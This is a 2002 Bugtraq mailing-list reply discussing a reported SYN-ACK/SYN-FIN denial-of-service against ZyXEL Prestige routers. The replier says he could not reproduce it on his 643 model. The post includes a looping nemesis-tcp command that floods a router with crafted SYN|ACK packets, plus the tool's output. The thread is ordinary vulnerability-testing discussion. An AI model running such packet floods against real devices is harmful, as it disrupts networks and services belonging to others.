Bugtraq mailing list archives

Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

From: Rich Henning <seclsts () fast net>
Date: Mon, 17 Jun 2002 13:02:54 -0400

On Mon, Jun 17, 2002 at 02:59:11PM +0200, Kistler Ueli wrote:

ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets.
It is possible to send a packet that will make unavailable
the router's services (Telnet&FTP, DHCP service not tested).
Network traffic isn't stopped.

Possibly more ZyNOS based routers are vulnerable. Please reply if you
found any other ZyNOS based router vulnerable.


I was unable to reproduce this behavior on my Zyxel 643 ADSL router,
even under extremely heavy (continuous) SYN|ACK packet flooding to
several ports.  excerpt of one such test session follows, concluded with
ZyNOS information.

Immediately after single-packet, during continuous bombardment, and
afterwards, I was able to access the configuration menu via telnet.

The FTP and HTTP services are disabled on my router, and the only
firewall rule is to protect the SNMP Service of the Zyxel itself from
the WAN side, as I have a linux 2.4/netfilter box that protects the LAN
side of the internal network.


Thanks for the heads-up Kistler!

---
# while /bin/true; do nemesis-tcp -v -fS -fA -S xxx.xxx.xxx.xxx -D yyy.yyy.yyy.yyy -y 40023 -d eth0; done

 [ ...repeatedly... ]

TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian () packetninja net>
Portions copyright (C) 2001 Jeff Nathan <jeff () wwti com>

[IP]  xxx.xxx.xxx.xxx > yyy.yyy.yyy.yyy 
[MAC]  00:90:27:62:5A:D6 > 0D:0E:0A:0D:00:01
[Ports] 42069 > 40023
[Flags]  SYN ACK 
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options] 
Wrote 54 byte TCP packet through linktype 1

TCP Packet Injected

---

ZyNOS F/W Version: V2.50(AY.1) | 9/19/2001
ADSL Chipset Vendor: Alcatel, Version  3.6.70
Standard: G.DMT

-- 
[ rich henning      ]                                             /"\
[ henninrp () fast net ]                                             \ /
                                                                   X
support the ascii ribbon campaign against html e-mail             / \

Current thread:

ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Kistler Ueli (Jun 17)
- Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Knud Erik Højgaard (Jun 17)
- Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Rich Henning (Jun 17)
  - Message not available
    - Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS -- 643R testing Kistler Ueli (Jun 17)
- <Possible follow-ups>
- RE: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS Christopher Gripp (Jun 25)